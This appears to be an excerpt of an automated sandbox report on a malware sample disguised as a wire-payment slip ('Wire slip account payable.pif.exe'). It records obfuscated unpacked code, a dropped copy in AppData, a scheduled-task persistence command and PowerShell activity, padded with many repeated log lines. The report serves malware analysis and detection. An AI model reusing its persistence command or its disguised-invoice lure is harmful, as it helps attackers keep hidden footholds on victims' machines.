Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 9_2_06C150B1 push EB9006BDh; ret	9_2_06C150BD
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 9_2_06C14808 push cs; retn 0006h	9_2_06C14812
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 14_2_02E4FAD0 push esp; ret	14_2_02E4FAF9

Source: Wire slip account payable.pif.exe	Static PE information: section name: .text entropy: 7.942591197199076
Source: EQVRGq.exe.0.dr	Static PE information: section name: .text entropy: 7.942591197199076

Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, ODaaLEmxZhSc3dyCQm.cs	High entropy of concatenated method names: 'aU3Vgk3KuE', 'vwiVHDuh7R', 'QHxVZ2iZ1o', 'LRTVu1uIff', 'a6PVhqngai', 'vUWZWbB14T', 'Bs0Z5yE0RX', 'gpEZ3ZZX1s', 'hSFZcjy6sZ', 'OGeZThLCse'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, jPw0qgzscD9FJa72lx.cs	High entropy of concatenated method names: 'gLwfv0j93H', 'hlufnkrMNu', 'rAgflIYoLM', 'BhpfmbJoGX', 'QRLfsXqsSH', 'fxZf9edMu4', 'Tw7fjCWtac', 'Lmufqn55fN', 'FvTfQRb4ql', 'NGWfydvahw'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, RuSwETDEJQv2nUAfUA4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ykVfFVPUc6', 'SDjf15p3T8', 'a9jfJdtH3X', 'uHhfrOLmBx', 'XUYfwI5vhr', 'MUmfaAdAZi', 'e21f2a9O0L'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, pBxTATDDe0IEkvu86CL.cs	High entropy of concatenated method names: 'h7ofUM9lh3', 'L7Ufzl0mXK', 'WFwoEPdonK', 'Hq4oDC3VL3', 'q0AoX4jxxj', 'l0Aopg1SNa', 'L93okQ52js', 'Bpwogtmy3B', 'brKoSxLNY8', 'j0yoHtgx8T'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, aIySoVaM59biZ07pMc.cs	High entropy of concatenated method names: 'ToString', 'YD0BFA0ifY', 'uNKBsLoFwP', 'SaYB6IGSO7', 'xKaB9xhFtv', 'xf9BjSoSXd', 'xZMBMFP1B4', 'nILBOS4SCN', 'pTXBi779mU', 'QKkBNOUREb'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, oYrUFM59tbVRIsk3J0.cs	High entropy of concatenated method names: 'JvcLcxKAOT', 'VddLUEQ3i7', 'cv4REJ3AOv', 'XvKRDR4d5p', 'BS9LF6dMqR', 'krrL1bfMXN', 'MxvLJR6dFI', 'WY4LrEnQrN', 'BSjLwWKsmN', 'xB1LafCBqg'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, rekgrBHhNjMSuwg2X1.cs	High entropy of concatenated method names: 'Dispose', 'c9vDTB3tp3', 'zeQXsMf2Z8', 'rQUdIpr0pb', 'qUZDU1GViN', 'PpNDzqJjFs', 'ProcessDialogKey', 'VCYXEvvLix', 'Lv7XDc8Tnn', 'TfmXXDDIIA'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, lZY9ig2UjcAbtXWD2r.cs	High entropy of concatenated method names: 'yyTLCYCKnr', 'odbLdvCr9j', 'ToString', 'NOsLSkrn80', 'rjlLHha6mD', 'clDLbEACu1', 'AiILZD3bxp', 'GnTLVc9ZNV', 'C6qLus3CQa', 'pBdLh9nD5R'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, pZVbNXDkSmntCVBLyS7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eDS408djmH', 'olK4fM4PZC', 'f294osP2xG', 'zuj44oo8gq', 'Eed4GBmsoW', 'inI4KIUQvU', 'lmF4quPnZn'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gNRWAGnXV8menB1Yeo.cs	High entropy of concatenated method names: 'qOXHrN3M3U', 'oeLHwV3318', 'QYaHan0Mli', 'EWQH2LVbC7', 'VgOHWwrfFN', 'jGHH5mfvAw', 'kajH3yqfkE', 'sgcHcXRkRV', 'gvlHT5cErU', 'lsQHUVofMs'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gL074BhmJSaIe9Ktd1.cs	High entropy of concatenated method names: 'd3TpgMAb2N', 'kB5pS8hIgE', 'sutpHIUnpP', 'A4mpbP4d5i', 'wfhpZSjIO2', 'Pd9pVSK2rc', 'fUqpum1tWZ', 'qC6phwaJNa', 'IS1p7XRvQ5', 'DnepCLJrSZ'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, CTYMvBkFF3Ro4mtHA4.cs	High entropy of concatenated method names: 'pxbDuNRWAG', 'cV8DhmenB1', 'XawDCmJu97', 'KJ3DdO8IQj', 'dm1Dx65FDa', 'SLEDBxZhSc', 'njTgAV96U26JDjZu9j', 'vYaVdhMaAEnToVIVST', 'RgqDDeNTDs', 'DwKDphN2gd'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, TdqXBTlawmJu97MJ3O.cs	High entropy of concatenated method names: 'zQTb81GNmm', 'GqJbvlbCWt', 'Xr9bnwwsSq', 'vLdbl4ZGPo', 'MLrbxZJW8X', 'rlobB8mYam', 'y5fbLCW7eo', 'iNmbRpFNgw', 'yKCb05p8bo', 'gFYbf5RCtA'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, iGIEem3Xqp9vB3tp3R.cs	High entropy of concatenated method names: 'qpS0x9xNLr', 's8u0LpaoEH', 'wqW00F0tEk', 'S910oAYs2C', 'rmQ0GWqwtO', 'vrB0qtrAGZ', 'Dispose', 'NamRSdm9I6', 'ND4RHHLyUW', 'wV3RbQVD8J'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, XFOAcwJ618FHIGWr3u.cs	High entropy of concatenated method names: 'mDsenSSHLE', 'yjqelaWwlE', 'Ymhemi71E9', 'ITTesoaMSd', 'P44e9YAJsd', 'oNQejHLSUt', 'AwNeOC1IZq', 'svTeifgrC9', 'FSSetLg6Eo', 'qGbeFdU3Hr'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, xGhgXlOC1DK2px56Aa.cs	High entropy of concatenated method names: 'eV7uS3f3Td', 'uaUubO5l4R', 'CWkuVNWrHN', 'tOdVUKNULR', 'mB8VzsVlVG', 'lYiuE3lmpZ', 'WdAuD054dr', 'uHFuX83H5a', 'EckuphHQUY', 'gihukPEMwO'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, NoJi4OX1MUCXoXy5rE.cs	High entropy of concatenated method names: 'B49P6S0HX', 'M7c8jHZmJ', 'gXYvox06X', 'SeeYsCIlR', 'mtjl380MW', 'B1rAI41En', 'DgWnHiB8Hnlwk5vNn9', 'oMmxM76FBoPeIKrmj9', 'pfZRTvmeK', 'MNwfRIshE'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, DvvLixTOv7c8Tnn2fm.cs	High entropy of concatenated method names: 'ag80mIF09b', 'zZ20sZcnS9', 'Klm06Fw7Z2', 'zYB09J8DuH', 'pmx0jnuyn0', 'QiS0MPZwme', 'GI80O7jYm8', 'CmU0ifDS6W', 'P5y0NJZb8K', 'FZC0t3NqGO'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, KJMhUlN5vVjFh8WZp0.cs	High entropy of concatenated method names: 'Xr4uQm5gj0', 'sHguyj1vyq', 'AF1uPUq4cQ', 'Iupu8R3sZ9', 'JkvuIrayYW', 'ftfuvaqHYC', 'x4KuYsSR2F', 'yUaunKDnfr', 'THfulcUUHP', 'nK4uACoetJ'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, Y7rgi5955mXeMWQUG8.cs	High entropy of concatenated method names: 'P1CVqSiccR', 'PANVQ9oK96', 'ouZVPbmK2G', 'D6NV84Etso', 'IWVVvKrWoa', 'CWjVYROIyA', 'wfnVl543PY', 'zdDVAJF9Rw', 'I2yg7IbQTrSA4Ws3fCJ', 'jwBO6tb4GWPklLaEhXh'
Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, bDIIAMUfPaTxjCX7Zs.cs	High entropy of concatenated method names: 'jbIfbsqMYQ', 'Nt6fZ3ZatT', 'SMmfVR9iZT', 'C3xfuKCPV4', 'USvf0eIgss', 'k2Qfh2HMaL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, ODaaLEmxZhSc3dyCQm.cs	High entropy of concatenated method names: 'aU3Vgk3KuE', 'vwiVHDuh7R', 'QHxVZ2iZ1o', 'LRTVu1uIff', 'a6PVhqngai', 'vUWZWbB14T', 'Bs0Z5yE0RX', 'gpEZ3ZZX1s', 'hSFZcjy6sZ', 'OGeZThLCse'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, jPw0qgzscD9FJa72lx.cs	High entropy of concatenated method names: 'gLwfv0j93H', 'hlufnkrMNu', 'rAgflIYoLM', 'BhpfmbJoGX', 'QRLfsXqsSH', 'fxZf9edMu4', 'Tw7fjCWtac', 'Lmufqn55fN', 'FvTfQRb4ql', 'NGWfydvahw'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, RuSwETDEJQv2nUAfUA4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ykVfFVPUc6', 'SDjf15p3T8', 'a9jfJdtH3X', 'uHhfrOLmBx', 'XUYfwI5vhr', 'MUmfaAdAZi', 'e21f2a9O0L'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, pBxTATDDe0IEkvu86CL.cs	High entropy of concatenated method names: 'h7ofUM9lh3', 'L7Ufzl0mXK', 'WFwoEPdonK', 'Hq4oDC3VL3', 'q0AoX4jxxj', 'l0Aopg1SNa', 'L93okQ52js', 'Bpwogtmy3B', 'brKoSxLNY8', 'j0yoHtgx8T'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, aIySoVaM59biZ07pMc.cs	High entropy of concatenated method names: 'ToString', 'YD0BFA0ifY', 'uNKBsLoFwP', 'SaYB6IGSO7', 'xKaB9xhFtv', 'xf9BjSoSXd', 'xZMBMFP1B4', 'nILBOS4SCN', 'pTXBi779mU', 'QKkBNOUREb'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, oYrUFM59tbVRIsk3J0.cs	High entropy of concatenated method names: 'JvcLcxKAOT', 'VddLUEQ3i7', 'cv4REJ3AOv', 'XvKRDR4d5p', 'BS9LF6dMqR', 'krrL1bfMXN', 'MxvLJR6dFI', 'WY4LrEnQrN', 'BSjLwWKsmN', 'xB1LafCBqg'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, rekgrBHhNjMSuwg2X1.cs	High entropy of concatenated method names: 'Dispose', 'c9vDTB3tp3', 'zeQXsMf2Z8', 'rQUdIpr0pb', 'qUZDU1GViN', 'PpNDzqJjFs', 'ProcessDialogKey', 'VCYXEvvLix', 'Lv7XDc8Tnn', 'TfmXXDDIIA'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, lZY9ig2UjcAbtXWD2r.cs	High entropy of concatenated method names: 'yyTLCYCKnr', 'odbLdvCr9j', 'ToString', 'NOsLSkrn80', 'rjlLHha6mD', 'clDLbEACu1', 'AiILZD3bxp', 'GnTLVc9ZNV', 'C6qLus3CQa', 'pBdLh9nD5R'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, pZVbNXDkSmntCVBLyS7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eDS408djmH', 'olK4fM4PZC', 'f294osP2xG', 'zuj44oo8gq', 'Eed4GBmsoW', 'inI4KIUQvU', 'lmF4quPnZn'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gNRWAGnXV8menB1Yeo.cs	High entropy of concatenated method names: 'qOXHrN3M3U', 'oeLHwV3318', 'QYaHan0Mli', 'EWQH2LVbC7', 'VgOHWwrfFN', 'jGHH5mfvAw', 'kajH3yqfkE', 'sgcHcXRkRV', 'gvlHT5cErU', 'lsQHUVofMs'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gL074BhmJSaIe9Ktd1.cs	High entropy of concatenated method names: 'd3TpgMAb2N', 'kB5pS8hIgE', 'sutpHIUnpP', 'A4mpbP4d5i', 'wfhpZSjIO2', 'Pd9pVSK2rc', 'fUqpum1tWZ', 'qC6phwaJNa', 'IS1p7XRvQ5', 'DnepCLJrSZ'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, CTYMvBkFF3Ro4mtHA4.cs	High entropy of concatenated method names: 'pxbDuNRWAG', 'cV8DhmenB1', 'XawDCmJu97', 'KJ3DdO8IQj', 'dm1Dx65FDa', 'SLEDBxZhSc', 'njTgAV96U26JDjZu9j', 'vYaVdhMaAEnToVIVST', 'RgqDDeNTDs', 'DwKDphN2gd'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, TdqXBTlawmJu97MJ3O.cs	High entropy of concatenated method names: 'zQTb81GNmm', 'GqJbvlbCWt', 'Xr9bnwwsSq', 'vLdbl4ZGPo', 'MLrbxZJW8X', 'rlobB8mYam', 'y5fbLCW7eo', 'iNmbRpFNgw', 'yKCb05p8bo', 'gFYbf5RCtA'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, iGIEem3Xqp9vB3tp3R.cs	High entropy of concatenated method names: 'qpS0x9xNLr', 's8u0LpaoEH', 'wqW00F0tEk', 'S910oAYs2C', 'rmQ0GWqwtO', 'vrB0qtrAGZ', 'Dispose', 'NamRSdm9I6', 'ND4RHHLyUW', 'wV3RbQVD8J'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, XFOAcwJ618FHIGWr3u.cs	High entropy of concatenated method names: 'mDsenSSHLE', 'yjqelaWwlE', 'Ymhemi71E9', 'ITTesoaMSd', 'P44e9YAJsd', 'oNQejHLSUt', 'AwNeOC1IZq', 'svTeifgrC9', 'FSSetLg6Eo', 'qGbeFdU3Hr'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, xGhgXlOC1DK2px56Aa.cs	High entropy of concatenated method names: 'eV7uS3f3Td', 'uaUubO5l4R', 'CWkuVNWrHN', 'tOdVUKNULR', 'mB8VzsVlVG', 'lYiuE3lmpZ', 'WdAuD054dr', 'uHFuX83H5a', 'EckuphHQUY', 'gihukPEMwO'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, NoJi4OX1MUCXoXy5rE.cs	High entropy of concatenated method names: 'B49P6S0HX', 'M7c8jHZmJ', 'gXYvox06X', 'SeeYsCIlR', 'mtjl380MW', 'B1rAI41En', 'DgWnHiB8Hnlwk5vNn9', 'oMmxM76FBoPeIKrmj9', 'pfZRTvmeK', 'MNwfRIshE'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, DvvLixTOv7c8Tnn2fm.cs	High entropy of concatenated method names: 'ag80mIF09b', 'zZ20sZcnS9', 'Klm06Fw7Z2', 'zYB09J8DuH', 'pmx0jnuyn0', 'QiS0MPZwme', 'GI80O7jYm8', 'CmU0ifDS6W', 'P5y0NJZb8K', 'FZC0t3NqGO'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, KJMhUlN5vVjFh8WZp0.cs	High entropy of concatenated method names: 'Xr4uQm5gj0', 'sHguyj1vyq', 'AF1uPUq4cQ', 'Iupu8R3sZ9', 'JkvuIrayYW', 'ftfuvaqHYC', 'x4KuYsSR2F', 'yUaunKDnfr', 'THfulcUUHP', 'nK4uACoetJ'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, Y7rgi5955mXeMWQUG8.cs	High entropy of concatenated method names: 'P1CVqSiccR', 'PANVQ9oK96', 'ouZVPbmK2G', 'D6NV84Etso', 'IWVVvKrWoa', 'CWjVYROIyA', 'wfnVl543PY', 'zdDVAJF9Rw', 'I2yg7IbQTrSA4Ws3fCJ', 'jwBO6tb4GWPklLaEhXh'
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, bDIIAMUfPaTxjCX7Zs.cs	High entropy of concatenated method names: 'jbIfbsqMYQ', 'Nt6fZ3ZatT', 'SMmfVR9iZT', 'C3xfuKCPV4', 'USvf0eIgss', 'k2Qfh2HMaL', 'Next', 'Next', 'Next', 'NextBytes'

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

File created: C:\Users\user\AppData\Roaming\EQVRGq.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
